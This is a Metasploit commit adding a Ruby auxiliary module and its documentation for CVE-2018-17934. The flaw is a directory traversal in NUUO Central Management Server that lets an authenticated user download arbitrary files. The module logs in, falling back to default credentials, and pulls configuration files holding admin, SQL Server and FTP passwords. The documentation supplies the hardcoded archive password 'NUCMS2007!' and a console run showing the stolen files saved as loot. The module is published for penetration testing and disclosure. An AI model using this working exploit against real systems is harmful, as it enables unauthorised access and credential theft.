Land #11293, Add Nuuo CMS file download

rapid7 · Feb 20, 2019 · 80147f5 · 80147f5
1 parent c9467ea
commit 80147f5
Show file tree

Hide file tree

Showing 2 changed files with 157 additions and 0 deletions.
diff --git a/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md
@@ -0,0 +1,71 @@
+## Description
+
+Nuuo CMS Authenticated Arbitrary File Download
+
+The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below:
+
+```
+GETCONFIG NUCM/1.0
+FileName: <filename>
+FileType: <number>
+User-Session-No: <session-number>
+```
+
+The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "<CMS_DIR>\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail.
+
+The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including:
+
+- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password)
+- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password
+- Any other sensitive files in the drive where CMS Server is installed.
+
+This module works in the following way:
+
+- if a SESSION number is present, uses that to login
+- if not, tries to authenticate with USERNAME and PASSWORD
+
+Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
+
+The following versions were tested:
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.2 OK
+ - 2.4.0 OK
+ - 2.6.0 OK
+ - 2.9.0 OK
+ - 2.10.0 OK
+ - 3.1 OK
+ - 3.3 OK
+ - 3.5 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server 2.4.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
+
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg
+[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database.
+[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem,
+[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit.
+[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the
+[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them.
+[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed!
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_file_download) >
+```
+
+## References
+
+- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
diff --git a/modules/auxiliary/gather/nuuo_cms_file_download.rb b/modules/auxiliary/gather/nuuo_cms_file_download.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Nuuo
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Nuuo Central Management Server Authenticated Arbitrary File Download',
+      'Description'    => %q{
+      The Nuuo Central Management Server allows an authenticated user to download files from the
+      installation folder. This functionality can be abused to obtain administrative credentials,
+      the SQL Server database password and arbitrary files off the system with directory traversal.
+      The module will attempt to download CMServer.cfg (the user configuration file with all the user
+      passwords including the admin one), ServerConfig.cfg (the server configuration file with the
+      SQL Server password) and a third file if the FILE argument is provided by the user.
+      The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
+      included in Metasploit, these files cannot be decrypted programmatically. The user will
+      have to open them with zip or a similar program and provide the default password "NUCMS2007!".
+      This module will either use a provided session number (which can be guessed with an auxiliary
+      module) or attempt to login using a provided username and password - it will also try the
+      default credentials if nothing is provided.
+      All versions of CMS server up to and including 3.5 are vulnerable to this attack.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-17934' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
+
+        ],
+      'Platform'        => ['win'],
+      'Privileged'      => true,
+      'DisclosureDate'  => 'Oct 11 2018'))
+
+    register_options(
+      [
+        OptString.new('FILE', [false, 'Additional file to download, use ..\\ to traverse directories from \
+        the CMS install folder'])
+      ])
+  end
+
+  def download_file(file_name, ctype='application/zip', decrypt=true)
+    dl_file = nucs_download_file(file_name, decrypt)
+    file_name = file_name.gsub('..\\', '')
+
+    path = store_loot(file_name, ctype, datastore['RHOST'],
+                      dl_file, file_name, "Nuuo CMS #{file_name} downloaded")
+    print_good("Downloaded file to #{path}")
+  end
+
+
+  def run
+    nucs_login
+
+    unless @nucs_session
+      fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
+    end
+
+    download_file('CMServer.cfg')
+    download_file('ServerConfig.cfg')
+
+    # note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed
+    # see the download_file method for details
+    print_status('The user and server configuration files were stored in the loot database.')
+    print_status('The files are ZIP encrypted, and due to the lack of the archive/zip gem,')
+    print_status('they cannot be decrypted in Metasploit.')
+    print_status('You will need to open them up with zip or a similar utility, and use the')
+    print_status('password NUCMS2007! to unzip them.')
+    print_status('Annoy the Metasploit developers until this gets fixed!')
+
+    if datastore['FILE']
+      filedata = download_file(datastore['FILE'], 'application/octet-stream', false)
+    end
+  end
+end